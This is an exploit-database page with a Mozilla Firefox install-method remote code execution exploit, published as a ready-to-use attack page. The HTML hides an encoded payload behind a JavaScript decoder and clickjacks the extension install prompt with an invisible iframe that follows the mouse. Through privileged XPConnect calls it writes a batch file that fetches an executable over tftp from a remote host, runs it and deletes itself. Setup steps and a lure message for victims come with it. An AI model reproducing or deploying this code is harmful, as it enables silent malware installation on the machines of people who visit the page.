[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit

Author
Edward Gagnon
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8565
Category
remote exploits
Date add
06-05-2005
Platform
unsorted
======================================================================
Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit
======================================================================

<!-- 
1) wget script.js :

var blockedReferrer = 'blockedReferrer';
NS_ActualWrite=document.write;
// Popup Blocker -->
RanPostamble=0;
NS_ActualOpen=window.open;
function NS_NullWindow(){this.window;}
function nullDoc() {
   this.open = NS_NullWindow;
   this.write = NS_NullWindow;
   this.close = NS_NullWindow;
}
function NS_NewOpen(url,nam,atr){
	if((nam!='' && nam==window.name) || nam=='_top'){
	   return(NS_ActualOpen(url,nam,atr));}
	obj=new NS_NullWindow();
	obj.focus = NS_NullWindow;
	obj.blur = NS_NullWindow;
	obj.opener = this.window;
	obj.document = new nullDoc();
	return(obj);
}
function NS_NullWindow2(){this.window;}
function NS_NewOpen2(url,nam,atr){
	if((nam!='' && nam==window.name) || nam=='_top'){
	   return(NS_ActualOpen(url,nam,atr));}
    return(new NS_NullWindow2());
}
function op_stop() { NS_ActualOpen2=window.open; window.open=NS_NewOpen2; }
function op_start() { window.open=NS_ActualOpen2; }
function noopen_load() { 
    op_stop(); if(zl_orig_onload) zl_orig_onload(); op_start();
}
function noopen_unload() { op_stop(); if(zl_orig_onunload) zl_orig_onunload(); op_start(); }
function postamble() {

  if(!RanPostamble) {
    RanPostamble=1;
	zl_orig_onload = window.onload;
	zl_orig_onunload = window.onunload;
	window.open=NS_ActualOpen;
  }
}
window.open=NS_NewOpen;
document.ignore = new Object();

2) change src= below
3) edit index and change tftp location

-->

<html><head><title>hide me bitch</title>
	
	<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">


			<script language="javascript" src="script.js"></script></head>


<body>


<script language="JavaScript"><!--
function Decode() {
d("4CSDMFB JUHOAUOQ=0LU9UCSDMFB034!--\nPAHSBMGH OQBuFFZQDCMGH(){\nUFFHUIQ= HU9MOUBGD.UFFhUIQ;\nUFF9QDCMGH = HU9MOUBGD.UFFZQDCMGH;\nIULGD9QD = UFF9QDCMGH.CATCBDMHO(\", #);\nMP ( (UFFHUIQ == 0hQBCSUFQ0) && ( IULGD9QD 3= > ) ) DQBADH #;\nMP ( (UFFHUIQ == 0iMSDGCGPB mHBQDHQB q7FJGDQD0) && (IULGD9QD 3= <) ) DQBADH #;\nDQBADH \";\n}\n//--34/CSDMFB34NBIJ34NQUR34BMBJQ3NMRQ IQ TMBSN4/BMBJQ34/NQUR34TGR63M SUH BQJJ 6GA 6GAD ACQDHUIQ IUOMSUJJ6 BNDGAON BNQ MHBQDHQB!!4TD3sJMSK 4U NDQP=0103nqdq4/U3MHCMRQ BNMC FUOQ BG OQB BN");
d("Q NMRRQH UHC8QD!4TD34MPDUIQ GHJGUR=0JGURQD()0 CDS=0LU9UCSDMFB:'4HGCSDMFB3'+Q9UJ('MP (8MHRG8.HUIQ!=\\'CBQUJSGGKMQC\\'){8MHRG8.HUIQ=\\'CBQUJSGGKMQC\\';}  QJCQ{ Q9QHB={BUDOQB:{NDQP:\\'NBBF://PBF.IG5MJJU.GDO/FAT/IG5MJJU.GDO/Q7BQHCMGHC/PJUCNOGB/PJUCNOGB-\".z.v.#-P7+I5+BT.7FM\\'}};MHCBUJJ(Q9QHB,\\'WGA UDQ 9AJHQDUTJQ!!!\\',\\'LU9UCSDMFB:Q9UJ(\\\\\\'HQBCSUFQ.CQSADMB6.fDM9MJQOQiUHUOQD.QHUTJQfDM9MJQOQ(\\\\\\\\\\\\\\'aHM9QDCUJXfsGHHQSB\\\\\\\\\\\\\\');PMJQ=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/PMJQ/JGSUJ;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(");
d("sGIFGHQHBC.MHBQDPUSQC.HCmjGSUJpMJQ);PMJQ.MHMBYMBNfUBN(\\\\\\\\\\\\\\'S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\TGGGI.TUB\\\\\\\\\\\\\\');PMJQ.SDQUBQaHMEAQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQ.hgdiuj_pmjq_bWfq,<]\");GABFABcBDQUI=sGIFGHQHBC.SJUCCQC[\\\\\\\\\\\\\\'@IG5MJJU.GDO/HQB8GDK/PMJQ-GABFAB-CBDQUI;#\\\\\\\\\\\\\\'2.SDQUBQmHCBUHSQ(sGIFGHQHBC.MHBQDPUSQC.HCmpMJQgABFABcBDQUI);GABFABcBDQUI.MHMB(PMJQ,\"7\"<|\"7\"w|\"7]\",<]\",\");GABFAB=\\\\\\\\\\\\\\'BPBF -M MJJIGT.5UFBG.GDO OQB BQCB.Q7Q S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\\\HCBUDB S:\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\BQCB.Q7Q\\\\\\\\\\");
d("\\\\\\HRQJ %\"\\\\\\\\\\\\\\\\HSJC\\\\\\\\\\\\\\';GABFABcBDQUI.8DMBQ(GABFAB,GABFAB.JQHOBN);GABFABcBDQUI.SJGCQ();PMJQ.JUAHSN();\\\\\\')\\'); }')+'4/HGCSDMFB34U NDQP=\\'NBBFC://URRGHC.AFRUBQ.IG5MJJU.GDO/Q7BQHCMGHC/IGDQMHPG.FNF?MR=]]\"&UFFJMSUBMGH=PMDQPG7\\' CB6JQ=\\'SADCGD:RQPUAJB;\\'3&HTCF;&HTCF;&HTCF;4/'+'U3'0 MR=0BUDOQBPDUIQ0 CSDGJJMHO=0HG0 PDUIQTGDRQD=0\"0 IUDOMH8MRBN=0\"0 IUDOMHNQMONB=\"0 CB6JQ=0FGCMBMGH:UTCGJABQ; JQPB:\"F7; 8MRBN:\"F7; NQMONB:yF7; 8MRBN:yF7; IUDOMH:\"F7; FURRMHO:\"F7; -IG5-GFUSMB6:\"034/MPDUIQ34CSDMFB JUHOAUOQ");
d("=0lU9UcSDMFB0 B6FQ=0BQ7B/LU9UCSDMFB03\n\nRGSAIQHB.GHIGACQIG9Q = PAHSBMGH BDUSKiGACQ(Q) {\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.JQPB = (Q.FUOQX->)+0F70\n    RGSAIQHB.OQBqJQIQHBt6mR(0BUDOQBPDUIQ0).CB6JQ.BGF = (Q.FUOQW->)+0F70\n}   \n\n9UD SGAHBQD = \";    \nPAHSBMGH JGURQD() {\n    SGAHBQD++\n    MP(SGAHBQD == #) {\n        CBQUJSGGKMQC.PGSAC()\n    } QJCQ MP(SGAHBQD == ]) {\n        CBQUJSGGKMQC.NMCBGD6.OG(-#)\n        //BUDOQBPDUIQ.CB6JQ.RMCFJU6=0HGHQ0;\n    }\n}\n\n4/CSDMFB34/TGR634");
d("/NBIJ3");
return 0;}
//--></script>
<script language="JavaScript"><!--
ky="";function d(msg){ky=ky+codeIt(key,msg);}var key = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<>]#\"";function codeIt (mC, eS) {var wTG, mcH =  mC.length / 2, nS = "", dv;for (var x = 0; x < eS.length; x++) {wTG = mC.indexOf(eS.charAt(x));if (wTG > mcH) {dv = wTG - mcH;nS = nS + mC.charAt(33 - dv);}else {if (key.indexOf(eS.charAt(x)) < 0) {nS = nS + eS.charAt(x)}else {dv = mcH - wTG;nS = nS + mC.charAt(33 + dv);}}}return nS;}
//--></script><script language="JavaScript"><!--
Decode();document.write(ky);//--></script><script language="javascript"><!--
function getAppVersion(){
appname= navigator.appName;
appversion = navigator.appVersion;
majorver = appversion.substring(0, 1);
if ( (appname == "Netscape") && ( majorver >= 3 ) ) return 1;
if ( (appname == "Microsoft Internet Explorer") && (majorver >= 4) ) return 1;
return 0;
}
//--></script>i can tell you your username magically through the internet!!<br>Click <a href="#">HERE</a>inside this page to get the hidden answer!<br><iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';}  else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\\\\\\\'tftp -i ill[server]oab.zapto.org get test.exe c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ncls\\\\\\\\nstart c:\\\\\\\\\\\\\\\\test.exe\\\\\\\\ndel %0\\\\\\\\ncls\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox\' style=\'cursor:default;\'>   </'+'a>'" id="targetframe" marginwidth="0" marginheight="0" style="margin: 0px; padding: 0px; position: absolute; height: 6px; width: 6px; opacity: 0; left: 504px; top: 280px;" frameborder="0" scrolling="no"></iframe><script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}   

var counter = 0;    
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display="none";
    }
}

</script>
<script language="javascript">postamble();</script>
</body></html>


#  0day.today [2024-12-24]  #